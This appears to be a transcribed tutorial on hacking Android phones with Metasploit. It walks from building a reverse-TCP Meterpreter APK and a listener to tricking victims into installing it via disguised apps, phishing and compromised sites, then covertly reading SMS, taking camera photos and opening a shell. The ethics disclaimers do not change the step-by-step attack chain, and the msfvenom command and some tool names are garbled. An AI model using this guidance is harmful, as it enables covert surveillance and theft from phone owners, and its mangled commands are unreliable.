Metasploit is a powerful tool, widely recognized in the cybersecurity community for its versatility and effectiveness. It is primarily used for penetration testing, which is a critical process in identifying and addressing security weaknesses. Penetration testing involves simulating attacks on systems to uncover vulnerabilities before malicious hackers can exploit them. This proactive approach helps in finding and fixing vulnerabilities, thereby strengthening the overall security posture of an organization. One area where Metasploit truly excels is in Android hacking, offering a comprehensive suite of tools for this purpose. Android, being one of the most popular mobile operating systems globally, is a frequent target for cyber attacks. This popularity makes it an attractive target for hackers who are constantly looking for ways to exploit its vulnerabilities. Metasploit offers a robust framework for testing Android security, enabling security professionals to identify and mitigate risks effectively. By simplifying the process of exploiting vulnerabilities, Metasploit makes it easier for ethical hackers to test and secure systems. It boasts a vast collection of exploits, each targeting specific known weaknesses in various systems, including Android. These exploits are designed to target known weaknesses in the Android operating system, making it easier to test and improve security. Hackers can use Metasploit to create custom payloads, which are essentially malicious programs designed to compromise target devices. These payloads are then delivered to the target device, often through various social engineering techniques or vulnerabilities. Once executed, these payloads provide unauthorized access to the attacker, highlighting the importance of understanding and defending against such threats. Understanding Metasploit is crucial for security professionals as it helps them proactively identify and fix vulnerabilities before they can be exploited. This essay will explore the basics of using Metasploit, providing a foundational understanding of its capabilities and applications. We will specifically focus on hacking Android devices, a common and critical area of concern in mobile security. The goal is to provide a foundational understanding that will enable readers to delve deeper into this complex and fascinating domain. This will allow readers to gain the knowledge needed to navigate and master the intricacies of the Metasploit framework. Remember, the information presented here is for educational purposes only and should be used responsibly. Using these techniques against systems without explicit permission is illegal and can have serious legal consequences. Always adhere to ethical hacking principles and ensure that your actions are within the bounds of the law. Before diving into Android hacking with Metasploit, a proper environment is essential. This ensures that your hacking activities are conducted in a controlled and secure manner. This typically involves setting up a virtual machine. Virtual machines allow you to create isolated environments on your computer. A virtual machine is a safe space to experiment. It acts as a sandbox, preventing any potential damage to your main operating system. It prevents damage to your main operating system. This is crucial when testing potentially harmful exploits or malware. Kali Linux is a popular choice for ethical hacking. It is a Debian-based Linux distribution designed for digital forensics and penetration testing. It comes pre-loaded with Metasploit and other useful tools. These tools are essential for conducting various types of security assessments. To begin, download a Kali Linux image. This image file will be used to install Kali Linux on your virtual machine. Several websites offer this for free. Always ensure you are downloading from the official Kali Linux website or other trusted sources. Make sure to download from a trusted source. This helps avoid downloading compromised or malicious software. Next, use virtualization software like VirtualBox to create a new virtual machine. VirtualBox is free and widely used for this purpose. VirtualBox allows you to run another operating system within your current one. This is perfect for testing and development. Allocate sufficient RAM and hard disk space to the virtual machine. This ensures smooth operation. Insufficient resources can lead to performance issues. Once the virtual machine is set up, boot into Kali Linux. Follow the on-screen instructions to complete the installation. Update the system to ensure you have the latest versions of all software. This is important for security and functionality. You can do this by typing apt-get update and apt-get upgrade in the terminal. This will fetch the latest updates from the repositories. This process fetches and installs any available updates. Keeping your system updated is a key practice in maintaining a secure environment. At the heart of any Metasploit attack is the payload. This is a malicious program designed to run on the target device. In our case, this will be an Android application package, or APK. We'll use MSV Venom, a Metasploit tool, to create this payload. Open the terminal in Kali Linux and type a command like this: msfvenomp android/meter_reverse_tcpt lochost =lport =r/root/evil.apk. Replace and with your Kali machine's IP address and a port you choose. This command instructs MSFvenom to create an APK file named evil.apk in the /root/ directory. This APK, when installed on an Android device, will connect back to your Kali machine. This establishes a remote session allowing you to control the device. The Metasploit payload provides us with a powerful suite of tools for post-exploitation. With the payload ready, we need to prepare Metasploit to receive the incoming connection. This involves setting up a listener. Think of this as an open ear waiting for the payload to call. Launch the Metasploit console by typing msf console in the terminal. Once loaded, type use exploit/multi/handler. This selects the handler exploit, which manages incoming connections. Next, set the payload to match the one we created earlier. Set payload android/meterpreter/reverse_tcp. Finally, configure the listener to use the correct IP address and port. Set lhost and set lport. Ensure the IP address and port match the ones used in the msfvenom command. Once configured, type exploit to start the listener. Metasploit is now patiently waiting for the payload to connect. Section 5. Deploying the payload. The next step is to deliver our malicious APK to the target Android device. This involves getting the APK onto the device without raising suspicion. Now, this is often the most challenging part, requiring a good deal of creativity and social engineering skills. Attackers must think like their targets to succeed. One common technique is to disguise the APK as a legitimate app. This can be done by mimicking popular apps that users trust. This could be a game, a utility tool, or even a productivity app that seems useful, or, something else that seems enticing. The key is to make it appealing enough for the user to download. Once the APK is disguised, it needs to be delivered. This is where the method of delivery becomes crucial. This could be done through phishing emails, which are designed to look like legitimate communications. Malicious links sent through social media, where users might click on a link from a trusted friend or contact, or by compromising websites to host the APK. This way, when users visit the site, they unknowingly download the malicious app. The ultimate goal here is to trick the user into downloading and installing the app. Once installed, the payload can execute its intended function. It's important to note, and I can't stress this enough, that tricking someone into installing malicious software is unethical and often illegal. Always act responsibly. This step is only for demonstration purposes in a controlled environment. Never attempt this in real-world scenarios without proper authorization. Section 6. Post-Exploitation Activities. If all goes according to plan, the user will install the malicious APK. Once launched, it will connect back to our listener. In the Metasploit console, you'll see a message confirming a successful connection. This means you now have control over the device. Type sessions, I, to interact with the device. Replace with the session ID displayed in Metasploit. You can now execute various commands on the device. For example, dump_SMS retrieves text messages, webcam_snap takes a picture using the device's camera, and shell gives you a command line interface on the device. The possibilities for post-exploitation are vast and depend on the payload used and the permissions granted to the malicious app. Section 7. The importance of ethical hacking. The techniques outlined in this essay demonstrate in exploiting Android vulnerabilities. However, this power comes with great responsibility. Using these techniques against systems without permission is illegal and unethical. Ethical hacking, also involves using these skills for good. Ethical hackers identify vulnerabilities before malicious actors can exploit them. They then report these findings responsibly, allowing developers to patch the security. This is crucial in making the digital world a safer place. Remember, with great power comes great responsibility. Always use your knowledge ethically and legally. Section 8. Expanding your cybersecurity toolkit. While Metasploit is a powerful tool for penetration testing, It's just one tool in a cybersecurity professional's arsenal. Other tools complement Metasploit and enhance your ability to assess and improve security. Nmap, for example, is a network scanner that allows you to discover devices and services running on a network. This can be useful in identifying potential targets. Wireshark is a packet analyzer that allows you to inspect network traffic in detail. This can be helpful in understanding how attacks are carried out. Burp Suite is a web application security testing tool that helps you find vulnerabilities in web applications. By familiarizing yourself with these and other tools, you can develop a more comprehensive approach to cybersecurity. Section 9. The path to becoming an ethical hacker. If you're interested in pursuing a career in ethical hacking, there are several steps you can take. Start by building a strong foundation in computer fundamentals. Learn about operating systems, networking, and programming. Linux and Unix-based systems are particularly relevant in the cybersecurity world. Consider learning programming languages like Python, JavaScript, and C++. These languages are commonly used in cybersecurity tools and scripts. Familiarize yourself with security concepts like cryptography, firewalls, and intrusion detection systems. Consider pursuing certifications like CompTIA Security Plus and Certified Ethical Hacker, CEH, to validate your skills. Most importantly, practice consistently. Set up a lab environment, experiment with different tools, and participate in Capture the Flag, CTF, competitions. The cybersecurity landscape is constantly evolving, so continuous learning is crucial.